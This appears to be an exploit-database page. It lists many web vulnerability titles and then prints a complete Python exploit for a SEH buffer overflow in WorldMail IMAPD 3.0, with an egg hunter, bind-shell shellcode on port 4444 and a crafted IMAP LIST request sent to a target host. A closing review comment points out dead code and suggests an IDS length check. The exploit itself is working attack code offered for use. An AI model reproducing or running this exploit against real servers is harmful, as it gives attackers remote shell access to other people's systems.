Bit Component - 'controller' Parameter Local File Inclusion MyBB Transactions Plugin 'transaction' Parameter SQL Injection MyBB Transactions Plugin - 'transaction' Parameter SQL Injection WHM 'filtername' Parameter Cross-Site Scripting WHM - 'filtername' Parameter Cross-Site Scripting Havalite CMS 'comment' Parameter HTML Injection Havalite CMS - 'comment' Parameter HTML Injection WordPress NextGEN Gallery Plugin 'test-head' Parameter Cross-Site Scripting WordPress NextGEN Gallery Plugin - 'test-head' Parameter Cross-Site Scripting WordPress Gallery Plugin 'filename_1' Parameter Remote Arbitrary File Access WordPress Gallery Plugin - 'filename_1' Parameter Remote Arbitrary File Access phpLiteAdmin 'table' Parameter SQL Injection IP.Gallery 'img' Parameter SQL Injection phpLiteAdmin - 'table' Parameter SQL Injection IP.Gallery - 'img' Parameter SQL Injection gpEasy CMS 'section' Parameter Cross-Site Scripting gpEasy CMS - 'section' Parameter Cross-Site Scripting iCart Pro 'section' Parameter SQL Injection iCart Pro - 'section' Parameter SQL Injection WordPress WP-Table Reloaded Plugin 'id' Parameter Cross-Site Scripting WordPress WP-Table Reloaded Plugin - 'id' Parameter Cross-Site Scripting WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross-Site Scripting WordPress CommentLuv Plugin - '_ajax_nonce' Parameter Cross-Site Scripting WordPress Audio Player Plugin 'playerID' Parameter Cross-Site Scripting WordPress Pinboard Theme 'tab' Parameter Cross-Site Scripting WordPress Audio Player Plugin - 'playerID' Parameter Cross-Site Scripting WordPress Pinboard Theme - 'tab' Parameter Cross-Site Scripting Squirrelcart 'table' Parameter Cross-Site Scripting Squirrelcart - 'table' Parameter Cross-Site Scripting OpenEMR 'site' Parameter Cross-Site Scripting OpenEMR - 'site' Parameter Cross-Site Scripting WordPress Uploader Plugin 'blog' Parameter Cross-Site Scripting WordPress Uploader Plugin - 'blog' Parameter Cross-Site Scripting WordPress Count Per Day Plugin 
'daytoshow' Parameter Cross-Site Scripting WordPress Count Per Day Plugin - 'daytoshow' Parameter Cross-Site Scripting WordPress podPress Plugin 'playerID' Parameter Cross-Site Scripting WordPress podPress Plugin - 'playerID' Parameter Cross-Site Scripting Jaow CMS 'add_ons' Parameter Cross-Site Scripting Jaow CMS - 'add_ons' Parameter Cross-Site Scripting WordPress Feedweb Plugin 'wp_post_id' Parameter Cross-Site Scripting WordPress Feedweb Plugin - 'wp_post_id' Parameter Cross-Site Scripting Symphony 'sort' Parameter SQL Injection Symphony - 'sort' Parameter SQL Injection WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross-Site Scripting WordPress Traffic Analyzer Plugin - 'aoid' Parameter Cross-Site Scripting WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection WordPress Spiffy XSPF Player Plugin - 'playlist_id' Parameter SQL Injection WordPress Spider Video Player Plugin 'theme' Parameter SQL Injection Request Tracker 'ShowPending' Parameter SQL Injection WordPress Spider Video Player Plugin - 'theme' Parameter SQL Injection Request Tracker - 'ShowPending' Parameter SQL Injection Fork CMS 'file' Parameter Local File Inclusion Fork CMS - 'file' Parameter Local File Inclusion WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Open Flash Chart 'get-data' Parameter Cross-Site Scripting WordPress wp-FileManager Plugin - 'path' Parameter Arbitrary File Download Open Flash Chart - 'get-data' Parameter Cross-Site Scripting Jojo CMS 'search' Parameter Cross-Site Scripting Jojo CMS - 'search' Parameter Cross-Site Scripting WordPress Ambience Theme 'src' Parameter Cross-Site Scripting WordPress Ambience Theme - 'src' Parameter Cross-Site Scripting TaxiMonger for Android 'name' Parameter HTML Injection TaxiMonger for Android - 'name' Parameter HTML Injection ZamFoo 'date' Parameter Remote Command Injection ZamFoo - 'date' Parameter Remote Command Injection Xorbin Analog Flash Clock 'widgetUrl' Parameter Cross-Site Scripting 
Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting WordPress WP Feed Plugin 'nid' Parameter SQL Injection WordPress Category Grid View Gallery Plugin 'ID' Parameter Cross-Site Scripting WordPress WP Feed Plugin - 'nid' Parameter SQL Injection WordPress Category Grid View Gallery Plugin - 'ID' Parameter Cross-Site Scripting WordPress FlagEm Plugin 'cID' Parameter Cross-Site Scripting WordPress FlagEm Plugin - 'cID' Parameter Cross-Site Scripting Xibo 'layout' Parameter HTML Injection Xibo - 'layout' Parameter HTML Injection Flo CMS 'archivem' Parameter SQL Injection Flo CMS - 'archivem' Parameter SQL Injection eTransfer Lite 'file name' Parameter HTML Injection WordPress mukioplayer4wp Plugin 'cid' Parameter SQL Injection eTransfer Lite - 'file name' Parameter HTML Injection WordPress mukioplayer4wp Plugin - 'cid' Parameter SQL Injection Monstra CMS 'login' Parameter SQL Injection Monstra CMS - 'login' Parameter SQL Injection Joomla! JVideoClip Component 'uid' Parameter SQL Injection Joomla! JVideoClip Component - 'uid' Parameter SQL Injection WordPress WP-Realty Plugin 'listing_id' Parameter SQL Injection WordPress WP-Realty Plugin - 'listing_id' Parameter SQL Injection Joomla! Maian15 Component 'name' Parameter Arbitrary Shell Upload Joomla! 
Maian15 Component - 'name' Parameter Arbitrary Shell Upload Nagios XI 'tfPassword' Parameter SQL Injection Nagios XI - 'tfPassword' Parameter SQL Injection Enorth Webpublisher CMS 'thisday' Parameter SQL Injection Enorth Webpublisher CMS - 'thisday' Parameter SQL Injection WordPress Easy Career Openings Plugin 'jobid' Parameter SQL Injection WordPress Easy Career Openings Plugin - 'jobid' Parameter SQL Injection eduTrac 'showmask' Parameter Directory Traversal eduTrac - 'showmask' Parameter Directory Traversal Veno File Manager 'q' Parameter Arbitrary File Download Veno File Manager - 'q' Parameter Arbitrary File Download Leed 'id' Parameter SQL Injection Leed - 'id' Parameter SQL Injection xBoard 'post' Parameter Local File Inclusion xBoard - 'post' Parameter Local File Inclusion i-doit Pro 'objID' Parameter SQL Injection i-doit Pro - 'objID' Parameter SQL Injection Joomla! Sexy Polling Extension 'answer_id' Parameter SQL Injection Joomla! Sexy Polling Extension - 'answer_id' Parameter SQL Injection XOS Shop 'goto' Parameter SQL Injection XOS Shop - 'goto' Parameter SQL Injection Eventum 'hostname' Parameter Remote Code Execution Eventum - 'hostname' Parameter Remote Code Execution WordPress Relevanssi Plugin 'category_name' Parameter SQL Injection WordPress Relevanssi Plugin - 'category_name' Parameter SQL Injection Professional Designer E-Store 'id' Parameter Multiple SQL Injection Professional Designer E-Store - 'id' Parameter Multiple SQL Injection MeiuPic 'ctl' Parameter Local File Inclusion MeiuPic - 'ctl' Parameter Local File Inclusion Jorjweb 'id' Parameter SQL Injection qEngine 'run' Parameter Local File Inclusion Jorjweb - 'id' Parameter SQL Injection qEngine - 'run' Parameter Local File Inclusion Seo Panel 'file' Parameter Directory Traversal Seo Panel - 'file' Parameter Directory Traversal ZeusCart 'prodid' Parameter SQL Injection ZeusCart - 'prodid' Parameter SQL Injection VoipSwitch 'action' Parameter Local File Inclusion VoipSwitch - 'action' 
Parameter Local File Inclusion Joomla! Spider Video Player Extension 'theme' Parameter SQL Injection Joomla! Spider Video Player Extension - 'theme' Parameter SQL Injection Microsoft Office Excel Out-of-Bounds Read Remote Code Execution (MS16-042) Microsoft Office Excel - Out-of-Bounds Read Remote Code Execution (MS16-042) Microsoft Office Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099) FreePBX 13 / 14 - Remote Code Execution Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) (2) Easy FTP Server - _APPE_ Command Buffer Overflow Remote Exploit
91 lines
No EOL
4.2 KiB
Python
Executable file
#!/usr/bin/env python
|
|
# -*- coding: latin-1 -*- # ####################################################
|
|
# ____ _ __ #
|
|
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
|
|
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
|
|
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
|
|
# /___/ nullsecurity team #
|
|
# #
|
|
# wm-imapd.py - WorldMail IMAPD remote exploit #
|
|
# #
|
|
# DATE #
|
|
# 09/01/2012 #
|
|
# #
|
|
# DESCRIPTION #
|
|
# WorldMail IMAPD - SEH overflow - remote exploit #
|
|
# #
|
|
# AUTHOR #
|
|
# TheXero - http://www.nullsecurity.net/ #
|
|
# #
|
|
################################################################################
|
|
|
|
import sys
|
|
import socket
|
|
|
|
## Exploit Title: WorldMail imapd 3.0 SEH overflow (egg hunter)
|
|
## Tested on: XP SP3 en-us
|
|
## Author: TheXero
|
|
## Website: www.thexero.co.uk
|
|
## http://www.nullsecurity.net
|
|
|
|
## Check for parameters
|
|
if len(sys.argv) != 3:
|
|
print "Usage: " + sys.argv[0] + " 127.0.0.1 143"
|
|
quit()
|
|
|
|
## Assigns the parameters
|
|
target = sys.argv[1]
|
|
port = int(sys.argv[2])
|
|
|
|
## Sets up the socket
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
|
|
## Sets the variables
|
|
char = "}"
|
|
nseh = "\xeb\x06\x90\x90"
|
|
seh = "\x4e\x3b\x01\x10" ## 10013B4E |. 59 POP ECX mailcmn.dll
|
|
buffer = '\x90' * 8
|
|
shellcode = ("T00WT00W" ## Bindshell port 4444
|
|
"\xbd\xe8\x39\x05\xa5\xdb\xdb\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
|
|
"\x56\x31\x68\x13\x03\x68\x13\x83\xc0\xec\xdb\xf0\x59\x04\x92"
|
|
"\xfb\xa1\xd4\xc5\x72\x44\xe5\xd7\xe1\x0c\x57\xe8\x62\x40\x5b"
|
|
"\x83\x27\x71\xe8\xe1\xef\x76\x59\x4f\xd6\xb9\x5a\x61\xd6\x16"
|
|
"\x98\xe3\xaa\x64\xcc\xc3\x93\xa6\x01\x05\xd3\xdb\xe9\x57\x8c"
|
|
"\x90\x5b\x48\xb9\xe5\x67\x69\x6d\x62\xd7\x11\x08\xb5\xa3\xab"
|
|
"\x13\xe6\x1b\xa7\x5c\x1e\x10\xef\x7c\x1f\xf5\xf3\x41\x56\x72"
|
|
"\xc7\x32\x69\x52\x19\xba\x5b\x9a\xf6\x85\x53\x17\x06\xc1\x54"
|
|
"\xc7\x7d\x39\xa7\x7a\x86\xfa\xd5\xa0\x03\x1f\x7d\x23\xb3\xfb"
|
|
"\x7f\xe0\x22\x8f\x8c\x4d\x20\xd7\x90\x50\xe5\x63\xac\xd9\x08"
|
|
"\xa4\x24\x99\x2e\x60\x6c\x7a\x4e\x31\xc8\x2d\x6f\x21\xb4\x92"
|
|
"\xd5\x29\x57\xc7\x6c\x70\x30\x24\x43\x8b\xc0\x22\xd4\xf8\xf2"
|
|
"\xed\x4e\x97\xbe\x66\x49\x60\xc0\x5d\x2d\xfe\x3f\x5d\x4e\xd6"
|
|
"\xfb\x09\x1e\x40\x2d\x31\xf5\x90\xd2\xe4\x5a\xc1\x7c\x56\x1b"
|
|
"\xb1\x3c\x06\xf3\xdb\xb2\x79\xe3\xe3\x18\x0c\x23\x2a\x78\x5d"
|
|
"\xc4\x4f\x7e\x70\x48\xd9\x98\x18\x60\x8f\x33\xb4\x42\xf4\x8b"
|
|
"\x23\xbc\xde\xa7\xfc\x2a\x56\xae\x3a\x54\x67\xe4\x69\xf9\xcf"
|
|
"\x6f\xf9\x11\xd4\x8e\xfe\x3f\x7c\xd8\xc7\xa8\xf6\xb4\x8a\x49"
|
|
"\x06\x9d\x7c\xe9\x95\x7a\x7c\x64\x86\xd4\x2b\x21\x78\x2d\xb9"
|
|
"\xdf\x23\x87\xdf\x1d\xb5\xe0\x5b\xfa\x06\xee\x62\x8f\x33\xd4"
|
|
"\x74\x49\xbb\x50\x20\x05\xea\x0e\x9e\xe3\x44\xe1\x48\xba\x3b"
|
|
"\xab\x1c\x3b\x70\x6c\x5a\x44\x5d\x1a\x82\xf5\x08\x5b\xbd\x3a"
|
|
"\xdd\x6b\xc6\x26\x7d\x93\x1d\xe3\x8d\xde\x3f\x42\x06\x87\xaa"
|
|
"\xd6\x4b\x38\x01\x14\x72\xbb\xa3\xe5\x81\xa3\xc6\xe0\xce\x63"
|
|
"\x3b\x99\x5f\x06\x3b\x0e\x5f\x03")
|
|
|
|
## Calculates the size of junk depending on the shellcode
|
|
junk = "\x41" * (769 - len(shellcode))
|
|
|
|
## Egg Hunter
|
|
hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"
|
|
"\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
|
|
|
|
## Assembles the buffer
|
|
buffer = char + junk + shellcode + nseh + seh + hunter + char
|
|
|
|
## Connects
|
|
s.connect((target,port))
|
|
data=s.recv(1024)
|
|
s.send("a001 LIST " + buffer + "\r\n")
|
|
s.close()
|
|
|
|
# EOF |
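Review bot: The `shellcode` tuple is documented only by the trailing `## Bindshell port 4444` comment, so nothing in the file lets a reader confirm what those bytes do. Record how the payload was produced next to it, for example `## payload provenance: <generator, encoder and bad-character set; not stated on this page>`. The earlier `buffer = '\x90' * 8` is dead code, because `buffer` is reassigned in full under "Assembles the buffer" and the NOP run is never sent; `data` from `s.recv(1024)` is likewise never read. For detection, the request this script builds is a single IMAP `LIST` whose argument is about 800 bytes wrapped in `}` characters, so a length limit on the LIST mailbox argument at an IDS or proxy catches it regardless of which payload is embedded.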